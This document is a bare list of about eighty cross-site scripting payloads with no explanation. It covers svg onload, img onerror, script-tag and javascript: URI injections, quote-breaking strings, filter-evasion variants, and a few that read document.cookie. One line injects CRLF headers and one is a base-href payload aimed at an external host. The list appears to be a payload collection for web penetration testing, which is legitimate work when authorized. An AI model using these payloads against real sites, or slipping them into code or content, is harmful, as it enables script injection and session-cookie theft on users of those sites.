”><svg onload=alert(1)>
?a=<svg onload=alert(1)>
”><svg onload=alert(1)>
” onmouseover=alert(1)//
</script><svg onload=alert(1)>
’-alert(1)-‘
\’-alert(1)//
<img src="blah" onerror=alert("Hello") />
<img src="blah" onerror=confirm("Hello") />
<img src="blah" ONERROR="alert('HHelloello')" />
<svg/onload=alert(1)>
<svg/onload=alert(document.cookie)>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>alert('document.cookie')</script>
<script>alert("document.cookie")</script>
"><h1test</h1>
'+alert(1)+'
"onmouseover="alert(1)
<a href="javascript:alert(1)">test</a>
</title><script>alert(1)</script>
--><script>alert(1)</script>
<<a|ascript>alert(`xss`)</script>
><script>alert(1)</script>
<svg/onload=alert(1)%20
<iframe src="javascript:alert(`xss`)">
"}]}';</script><script>alert('XSS')</script>
<svg onload=alert(1)>
<img src=# onerror=alert(1)>
<SCRIPT>alert('XSS')</SCRIPT>
<IMG SRC="#" ONERROR="alert('XSS')"/>
<INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<img src="x" onerror="alert(1)"/>
e3i7x<input type=text autofocus onfocus=alert(1)//agq27
<input type="button" oncliconcliconcliconcliconclickkkkk="alert('XSS')"/>
<img src=x onerror=;;alert('XSS') />
" onfocus="alert(1)
<img onerror=alert(1) src=a>
<img onerror="alert(1) "src=a>
<<img onerror=alert(1) src=a>>
<xml onreadystatechange=alert(1)>
';alert(1) ; var foo='
<a href="javascript:alert(document.domain)">
javascript:alert(1) ;
";alert(1)//
'-alert(1)-'
'-alert(document.domain)-'
';alert(document.domain)//
"><script>alert(document.cookie)</script>
"><ScRiPt>alert(document.cookie)</ScRiPt>
"><script>alert('XSS')</script>
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
" autofocus onfocus=alert(document.domain) x="
”onmousemove=alert(‘oops’);//
');alert(document.cookie+' Invalide
"><svg onload=alert(1)>
</title><svg/onload=alert(1)> 
</noscript><svg/onload=alert(1)>
</style><svg/onload=alert(1)>
%26apos;-alert(1)-%26apos;
<svg onload=alert(1)>
"><svg/onload=alert(1)>
'><svg/onload=alert(1)>
"autofocus/onfocus="alert(1)
'autofocus/onfocus='alert(1)
</textarea><svg/onload=alert(1)>
</script><svg/onload=alert(1)>
</script><svg/onload=alert(1)>
'-alert(1)-'
"-alert(1)-"
\'-alert(1)//
\"-alert(1)//
</script><svg/onload=alert(1)> 
`-alert(1)-`
\`-alert(1)//
${alert(1)}
javascript://%250Aalert(1)//?1 (click in KNOXSS glitch)
"onload="alert(1) or "></iframe><svg/onload=alert(1)>
1%0D%0AContent-Type:text/html%0D%0A<svg/onload=alert(1)>
/alert(1)//\
<svg/onload=alert(1)>
javascript:alert(1)
alert(1)
--><svg/onload=alert(1)>
<!--><svg/onload=alert(1)-->
\74img/src/onerror=alert(1)\76
"><svg/onload=alert(1)>
?CSP&p05=<base/href=//X55.is>